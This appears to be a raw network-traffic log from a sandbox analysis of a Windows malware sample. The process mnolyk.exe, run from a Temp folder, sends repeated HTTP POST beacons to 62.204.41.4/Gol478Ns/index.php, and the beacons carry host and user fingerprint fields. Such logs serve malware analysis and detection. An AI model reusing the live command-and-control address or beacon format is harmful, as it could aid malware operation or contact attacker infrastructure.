Feb 7, 2023 20:01:22.732220888 CET	248	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
122	192.168.2.6	49843	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:22.907370090 CET	249	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:22.972731113 CET	249	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
123	192.168.2.6	49844	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:23.138925076 CET	249	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:23.204888105 CET	250	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
124	192.168.2.6	49845	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:23.372817039 CET	251	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:23.434403896 CET	251	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
125	192.168.2.6	49846	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:23.606580973 CET	252	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:23.677861929 CET	252	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
126	192.168.2.6	49847	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:23.854307890 CET	253	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:23.918473005 CET	253	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
127	192.168.2.6	49848	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:24.096024990 CET	254	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:24.164890051 CET	254	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
128	192.168.2.6	49849	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:24.342359066 CET	255	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:24.406771898 CET	255	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
129	192.168.2.6	49850	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:24.592098951 CET	256	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:24.656240940 CET	256	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.6	49731	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:54.023441076 CET	118	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:54.087827921 CET	118	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
130	192.168.2.6	49851	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:24.881496906 CET	257	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:24.946882963 CET	257	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
131	192.168.2.6	49852	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:25.383304119 CET	258	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:25.449835062 CET	258	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
132	192.168.2.6	49853	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:25.706872940 CET	259	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:25.771174908 CET	259	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
133	192.168.2.6	49854	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:26.635793924 CET	260	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:26.700578928 CET	260	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
134	192.168.2.6	49855	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:26.978024006 CET	261	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:27.043203115 CET	261	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
135	192.168.2.6	49856	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:28.475142002 CET	262	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:28.542397022 CET	262	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
136	192.168.2.6	49857	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:28.881944895 CET	263	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:28.947046995 CET	263	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
137	192.168.2.6	49858	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:29.126523972 CET	264	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:29.194288015 CET	264	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
138	192.168.2.6	49859	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:29.375750065 CET	265	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:29.442006111 CET	265	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
139	192.168.2.6	49860	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:29.628066063 CET	266	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:29.692550898 CET	266	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.6	49732	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:54.261631966 CET	119	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:54.325506926 CET	119	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
140	192.168.2.6	49861	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:29.882531881 CET	267	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:29.945761919 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
141	192.168.2.6	49862	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
